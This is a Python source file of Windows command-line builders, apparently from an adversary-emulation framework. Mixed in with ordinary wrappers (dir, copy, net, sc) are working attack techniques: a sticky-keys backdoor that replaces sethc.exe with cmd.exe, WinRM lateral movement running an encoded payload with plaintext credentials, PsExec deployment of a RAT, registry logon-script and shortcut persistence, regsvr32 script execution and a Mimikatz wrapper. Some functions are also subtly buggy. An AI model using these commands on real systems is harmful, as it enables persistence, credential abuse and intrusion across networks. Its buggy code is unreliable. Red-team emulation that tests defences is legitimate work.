def accessFeatA(key_id: int) -> Tuple [CommandLine, Callable[[str], None]]: command_line = "cmd.exe /C \"takeown /f C:\\Windows\\System32\\sethc.exe && icacls " \ "C:\\Windows\\System32\\sethc.exe /grant administrators:f " \ "&& move C:\\Windows\\System32\\sethc.exe " \ "C:\\Windows\\System32\\sethc.exe." + str(key_id) + " && copy C:\\Windows\\System32\\cmd.exe " \ "C:\\Windows\\System32\\sethc.exe\"" return CommandLine(command_line), parsers.static.accessFeat
def dir_list(search: Union[str, list], b: bool, s: bool, a: str) -> Tuple[CommandLine, Callable[[str], None]]: """ dir_list is the "dir" command that lists the files/folders in a directory Args: search: what to list, can either be a single full path (str) or can be a list of things to search for within the current working directory (list) b: bool on if we should include the /b flag in the query (bare info, just filename) s: bool on if we should include the /s flag in the query (recursive) a: potential arguments to include with the /a flag if a is not None Returns: The CommandLine and a parser for the output of the command """ args = ["cmd /c dir"] if isinstance(search, str): args.append("\"" + search + "\"") # this is the instance where you do dir C:\ else: for word in list: args.append( "*" + word + "*") # this is the instance where you do dir *test* *files* if b: args.append('/b') if s: args.append('/s') if a is not None: args.append('/a' + a) # outputs of these different switches is radically different, so need different parsers for the different versions if b and s: return CommandLine(args), parsers.cmd.dir_collect else: raise errors.ParserNotImplementedError
def __init__(self, function_name: str, *args: PSArg) -> None: self.command = [function_name] for arg in args: self.command.append(arg.text) self.command = CommandLine(self.command)
def files() -> Tuple[CommandLine, Callable[[str], None]]: command = 'powershell -command "&{$filetype = @(\\"*.docx\\",\\"*.pdf\\",\\"*.xlsx\\"); $startdir = ' \ '\\"c:\\\\Users\\\\\\"; for($k=0;$k -lt $filetype.length; $k++){ $core = dir $startdir\($filetype[$k]) ' \ '-Recurse | Select @{Name=\\"Path\\";Expression={$_.Fullname -as [string]}}; foreach ($alpha in $core) ' \ '{$filename = $alpha.Path -as [string]; [Byte[]] $corrupt_file = [System.IO.File]::ReadAllBytes(' \ '$filename); [Byte[]] $key_file = [System.IO.File]::ReadAllBytes($(' \ '-join($filename, \\".old\\"))); for($i=0; $i -lt $key_file.Length; $i++) { $corrupt_file[$i] = ' \ '$key_file[$i];} [System.IO.File]::WriteAllBytes($(resolve-path $filename), $corrupt_file); ' \ 'Remove-Item $(-join($filename,\\".old\\"))}}}"' return CommandLine( 'cmd /c {}'.format(command)), parsers.footprint.recover_files
def delete(path: str) -> Tuple[CommandLine, Callable[[str], None]]: """ delete is the "del" command that deletes a file Args: path: the path of the file to be deleted Returns: The CommandLine and a parser for the output of the command """ args = ['cmd /c del', "\"" + path + "\""] return CommandLine(args), parsers.cmd.delete
def runas(user: str, program: str, args: List[str] = None) -> CommandLine: """ The net command is one of Windows' many swiss army knives. :type context: ExecutionContext :param args: Additional command line arguments to net.exe :return: """ command_line = ['runas.exe'] if args: command_line += args return CommandLine(command_line)
def copy(src_file_path: str, dst_file_path: str) -> Tuple[CommandLine, Callable[[str], None]]: """ Copies a file using the copy command built in to cmd.exe Args: src_file_path: The source path of the file that will be copied dst_file_path: The destination path of the file that will be copied Returns: The CommandLine and a parser for the output of the command """ return CommandLine('cmd /c copy \"{}\" \"{}\"'.format( src_file_path, dst_file_path)), parsers.cmd.copy
def wmic(args: List[str]=None) -> CommandLine: """Wrapper for the windows tool wmic.exe Args: args: The additional arguments for the command line Returns: The CommandLine """ command_line = ["wmic"] if args is not None: command_line += args return CommandLine(command_line)
def xcopy(args: List[str], overwrite_destination: bool) -> CommandLine: """Copies files and directories, including subdirectories. Ref: https://technet.microsoft.com/en-us/library/bb491035.aspx Args: args: Additional command line arguments to xcopy.exe overwrite_destination: True means overwrite the destination if it already exists. Returns: The CommandLine """ if overwrite_destination: args.append('/y') return CommandLine(args)
def tasklist(args: List[str]=None) -> CommandLine: """Commandline wrapper for the windows tasklist command. Args: args: Additional command line arguments Returns: The CommandLine """ command_line = ['tasklist'] if args: command_line += args return CommandLine(command_line)
def net(args: List[str]=None) -> CommandLine: """ The net command is one of Windows' many swiss army knives. Args: args: Additional command line arguments to net.exe Returns: The CommandLine """ command_line = ['net'] if args: command_line += args return CommandLine(command_line)
def powershell( command: str, parser=parsers.cmd.powershell_file ) -> Tuple[CommandLine, Callable[[str], None]]: """ Runs a Powershell query through the Windows command prompt. Args: command: the PowerShell command to run. Remmeber that you can separate multiple PowerShell commands with ; Returns: The CommandLine and a parser for the output of the command """ ps_command = "powershell -ExecutionPolicy Bypass -WindowStyle Minimized -Command " + command return CommandLine('cmd /c \"{}\""'.format(ps_command)), parser
def at(remote_host: str = None, args: List[str] = None) -> CommandLine: """ The net command is one of Windows' many swiss army knives. Args: remote_host: The host that is the target of the at command args: Additional command line arguments to net.exe """ command_line = ['at'] if remote_host: args.append('\\' + remote_host) if args: command_line += args return CommandLine(command_line)
def makecab(path: str = None, args: List[str] = None) -> CommandLine: """ Makes a cabinet file Args: path: path to the cabinet file args: Additional command line arguments to net.exe """ command_line = ['makecab'] command_line += " " + path if args: command_line += args return CommandLine(command_line)
def sc(args: List[str] = None, remote_host: str = None) -> CommandLine: """ Wrapper for the windows tool sc.exe Args: args: The additional arguments for the command line remote_host: Optional - run on a remote host via RPC. Returns: The CommandLine """ command_line = ["sc.exe"] if remote_host is not None: command_line.append('\\\\' + remote_host) if args is not None: command_line += args return CommandLine(command_line)
def shutdown(reboot: bool, delay: int, force: bool) -> Tuple[CommandLine, Callable[[str], None]]: """ Issues the command to shutdown the current computer, possibly for reboot Args: reboot: boolean if the shutdown should reboot delay: how long the computer should wait until starting to shutdown force: boolean if the computer should force close all open programs or prompt user for input Returns: The CommandLine and a parser for the output of the command """ args = ['shutdown', '/t', str(delay)] if reboot: args.append('/r') if force: args.append('/f') command = ' '.join(args) return CommandLine('cmd /c {}'.format(command)), parsers.shutdown.shutdown
def move( src_file_path: str, dst_file_path: str, suppress_overwrite: bool) -> Tuple[CommandLine, Callable[[str], None]]: """ move is the "move" command that moves a file Args: src_file_path: path of current file dst_file_path: path where the new file will be suppress_overwrite: bool to overwrite a file if it already exists Returns: The CommandLine and a parser for the output of the command """ args = ['move'] if suppress_overwrite: args.append('/Y') command = ' '.join(args) return CommandLine('cmd /c {} \"{}\" \"{}\"'.format( command, src_file_path, dst_file_path)), parsers.cmd.move
def lateral_movement( ip: str, password: str, domain: str, user: str, file_loc: str) -> Tuple[CommandLine, Callable[[str], None]]: com = base64.b64encode( bytes( "Invoke-WmiMethod -path win32_process -name create -argumentlist '" + file_loc + "'", 'UTF-16LE')).decode("UTF-8") command_line = [ 'powershell', '-ExecutionPolicy Bypass', '-NoLogo', '-NonInteractive', '-NoProfile', '-Command', '"Set-Item WSMan:localhost\\client\\trustedhosts -value ' + ip + '-Concatenate -Force;', '$pw = convertto-securestring -AsPlainText -Force -String ' + password + ';', '$cred = new-object -typename System.Management.Automation.PSCredential -argumentlist ' + domain + "\\" + user + ',$pw;', 'invoke-command -computerName ' + ip + ' -credential $cred ' '-scriptblock {' + 'powershell.exe -ExecutionPolicy Bypass -EncodedCommand ' + com + ' }"' ] return CommandLine(command_line), parsers.winrm.lateral_movement
def reg(remote_host: str = None, args: List[str] = None) -> CommandLine: """ The reg command is used to query and modify the Windows registry. Args: remote_host: The host that is the target of the reg operation args: Additional command line arguments to reg.exe Returns: The CommandLine """ command_line = ['reg'] if remote_host is not None: command_line += "\\\\{}".format(remote_host) if args: command_line += args return CommandLine(command_line)
def copy(ps_file_path: str, rat_file_path: str, user_domain: str, username: str, password: str, target: str, elevated: bool = True) -> Tuple[CommandLine, Callable[[str], None]]: """Builds a commandline for PsExec to copy and execute a file remotely Args: ps_file_path: The path to the psexec binary rat_file_path: The path to the ratremote computer username: The username remote share user_domain: The (Windows) domain of the user account password: (Optional) The password to be used target: The target host to run the file on elevated: Allows the created process to be run in an elevated context Returns: The CommandLine and a parser """ args = [ps_file_path, "-accepteula", "-u", user_domain + "\\" + username, "-p", password, "-h" if elevated else '', "-d", "-cv", rat_file_path, "\\\\" + target] return CommandLine(args), parsers.psexec.copy
def bypassB() -> Tuple [CommandLine, Callable[[str], None]]: command_line = ['powershell', '-executionPolicy', 'Bypass', '-file', "C:\\bypassB.ps1"] return CommandLine(command_line), parsers.static.bypassB
def netstat(args: List[str] = None) -> CommandLine: command_line = ['netstat'] if args: command_line += args return CommandLine(command_line)
def regsvr32() -> Tuple[CommandLine, Callable[[str], None]]: command_line = ['regsvr32', '/s /u /i:C://Example.sct scrobj.dll'] return CommandLine(command_line), parsers.test.regsvr32
def logonScriptB() -> Tuple [CommandLine, Callable[[str], None]]: command_line = ['reg', 'add', 'HKCU\\Environment', '/v', 'UserInitMprLogonScript', '/t', 'REG_SZ', '/d', 'C:\\totally_innocent_executable.exe', '/f'] return CommandLine(command_line), parsers.static.logonScript
def shortcutmodify(target_path: str, rat_path: str) -> Tuple[CommandLine, Callable[[str], None]]: command_line = ['powershell', '-ExecutionPolicy Bypass', '-NoLogo', '-NonInteractive', '-NoProfile', '-Command', '"$SHORTCUT=\'' + target_path + '\';$TARGET=\'' + rat_path + '\';$ws = New-Object -ComObject ' + 'WScript.Shell; $s = $ws.CreateShortcut($SHORTCUT); $S.TargetPath = $TARGET; $S.Save()"'] return CommandLine(command_line), parsers.static.shortcutmodify
def cleanupCMD(CleanCmd: str) -> Tuple [CommandLine, Callable[[str], None]]: command_line = [CleanCmd] return CommandLine(command_line), parsers.static.cleanup
def password(user: str, password: str) -> Tuple[CommandLine, Callable[[str], None]]: command = 'net user ' + user + ' ' + password return CommandLine('cmd /c {}'.format(command)), parsers.footprint.password
def logonScriptA() -> Tuple [CommandLine, Callable[[str], None]]: command_line = ['reg', 'export', 'HKCU\\Environment', 'C:\\envn.reg'] return CommandLine(command_line), parsers.static.logonScript
def __init__(self, *args: MimikatzSubcommand) -> None: if '\\' in args[0].text: self.command = CommandLine(['cls'] + [x.text for x in args]) else: self.command = CommandLine([x.text for x in args])